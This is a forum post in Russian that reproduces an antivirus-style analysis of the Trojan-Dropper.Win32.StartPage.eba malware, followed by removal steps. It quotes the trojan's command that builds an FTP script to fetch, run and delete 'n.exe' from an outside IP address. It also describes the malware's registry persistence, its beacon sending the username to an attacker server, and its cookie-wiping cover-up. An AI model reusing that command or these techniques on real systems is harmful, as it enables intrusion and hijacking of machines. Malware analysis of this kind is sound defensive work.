Форум - Software - Trojan-Dropper.Win32.StartPage.eba

#39730 by trojan.WinLock Антигерой Года (Информатор) в 2011-10-11 16:47:30 , (269 недели) назадTop




  Сообщений: 1147


Технические детали
Троянская программа, которая устанавливает и запускает другое программное обеспечение на зараженном компьютере без ведома пользователя. Является приложением Windows (PE EXE-файл). Имеет размер 25169 байта. Программа упакована неизвестным упаковщиком. Распакованный размер –около 74 КБ. Написана на C++.

Деструктивная активность

Если в пути к файлу троянца отсутствовала последовательность символов "ommon", тогда троянец извлекает из своего тела и запускает на исполнение скрипт со случайным именем:
%ProgramFiles%\<rnd>.hta
(md5: D7444767D527E6E97BD3EB85D60E800D)
<rnd> - последовательность из трех символов латинского алфавита, например, "YSQ".

Данный файл имеет размер 803 байта и детектируется антивирусом Касперского как Trojan.VBS.StartPage.hw.

Запуск данного вредоносного скрипта приводит к изменению стартовой страницы, а также поисковой страницы, используемой по умолчанию, браузера Internet Explorer путем добавления следующей информации в ключи системного реестра:
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "www.5***ling.com"
"Search Page" = "www.5***iling.com"
"default_page_url" = "www.5***ling.com"
а также обеспечивает автоматический запуск копии троянца при каждом следующем старте системы:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"safe360" = "%ProgramFiles%\Common Files\sebsbvx\coiome.exe

После этого троянец создает копию своего файла с именем "coiome.exe" и удаляет свой оригинальный файл:

%ProgramFiles%\Common Files\sebsbvx\coiome.exe

При этом файлу устанавливает дату создания "17.08.2009", а каталогу, в котором находится копия троянца, устанавливает атрибуты "скрытый" и "системный":

%ProgramFiles%\Common Files\sebsbvx

При создании своей копии троянец может добавлять в файл случайную последовательность символов, таким образом хэши файлов копий троянца будут различаться. Также троянец может добавлять в файл последовательность символа "2", таким образом увеличивая размер своей копии.

После этого троянец запускает на исполнение свою копию и завершает выполнение.

Троянец загружает файл со следующего URL:
http://j.q***800.com/b.jpg
сохраняет загруженный файл с именем:

%WinDir%\Fonts\oh.ini

Данный фал является файлом конфигурации и используется троянцем в дальнейшем.

Используя системный файл:
%System%\sc.exe
устанавливает автоматический запуск службам со следующими именами:
lanmanworkstation
lanmanserver
RpcLocator
Browser
NtLmSsp
LmHosts

После этого запускает на исполнение вышеперечисленные службы, используя системный файл:

%System%\net1.exe

Далее троянец отправляет запрос на сервер злоумышленника с целью передать в запросе данные о зараженном компьютере:
http://tj.q***800.com/t/Count.asp?mac=&ver=01&t=<имя пользователя компьютера>

На момент создания описания с сервера приходил следующий ответ:
addok

Для сокрытия своей работы в Интернет в отдельном потоке удаляет файлы из каталогов:
%userprofile%\Cookies\*.*
%userprofile%\Local Settings\Temporary Internet Files\*.*
%userprofile%\Local Settings\Temp\Cookies\*.*

Перед удалением у файлов снимает атрибуты "только чтение", "скрытый", "системный" и "архивный".

Создает каталог с именем:
%AppData%\f.exe

Удаляет информацию из реестра о службе с именем:

JavaServe

Удаляет файлы:
%ProgramFiles%\Internet Explorer\usp10.dll
%WinDir%\ModFan\mone.dll
%WinDir%\UoDo\game.dll

Троянец извлекает из своего тела файл:
%WinDir%\Tasks\<rnd2>i.vbe
<rnd2> - последовательность из 3-х случайных латинских символов.

Данный файл имеет размер 2117 байт. Файл является вспомогательным и используется для дальнейшей работы троянца.

После этого извлекает из своего тела файл:
%WinDir%\Tasks\<rnd3>e.exe
<rnd3> - последовательность из 3-х случайных букв латинского алфавита, например, "DNP".

Данный файл детектируется антивирусом Касперского как Exploit.Win32.IMG-WMF.fk.

В извлеченный файл дописывает время работы компьютера пользователя, таким образом хэш файла будет различаться при каждом создании. Также троянец может добавлять в файл последовательность символа "0", таким образом файл может иметь различный размер от 3748 байт.

Троянец определяет IP-адрес компьютера пользователя, затем читает и расшифровывает ранее извлеченный файл конфигурации с именем:
%WinDir%\Fonts\oh.ini
из этого файла троянец получает один из параметров, с которыми запускает файл:
%WinDir%\Tasks\e.exe <параметр1> <параметр2>

<параметр1> - IP-адрес (троянец перебирает IP-адреса локальной сети в которой находился зараженный компьютер)

<параметр2> - расшифрованный URL, полученный из файла конфигурации.

На момент создания описания в файле конфигурации была следующая ссылка:

http://dh***88.org/p/mi.exe (32891 байт, детектируется антивирусом Касперского как Trojan-Downloader.Win32.Geral.adeh)

После этого выполняет команду следующего вида:

%System%\cscript.exe %WinDir%\Tasks\<rnd2>i.vbe <IP-адрес атакуемого компьютера> administrator "" "cmd /c @echo open 61.129.51.245>>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get n.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&n.exe&n.exe&del n.exe"
Таким образом троянец пытается загрузить на атакуемый компьютер и запустить на исполнение файл с FTP-сервера с именем "n.exe", после успешного запуска удаляет этот файл.
Перед завершением работы удаляет файл:
%ProgramFiles%\<rnd>.hta

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
При помощи ( "Диспетчера задач") завершить троянский процесс:
coiome.exe
Удалить файлы:
%ProgramFiles%\<rnd>.hta
%ProgramFiles%\Common Files\sebsbvx\coiome.exe
%WinDir%\Fonts\oh.ini
%WinDir%\Tasks\<rnd2>i.vbe
%WinDir%\Tasks\<rnd3>e.exe
Удалить каталог:
%AppData%\f.exe
Восстановить измененные значения параметров ключей системного реестра (как работать с реестром?):
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page"
"Search Page"
"default_page_url"
Удалить параметр ключа системного реестра:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"safe360" = "%ProgramFiles%\Common Files\sebsbvx\coiome.exe
Очистить каталог Temporary Internet Files, содержащий инфицированные файлы(Как удалить инфицированные файлы в папке Temporary Internet Files?):
%Temporary Internet Files%
Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).


md5:   14210E624FCCF904799E90A589A4B975

sha1:  3EE389EA35C2264A6586C6A26E1635032C7D2FEB
Отправить сообщеньку

       [1]       

Быстрый переход: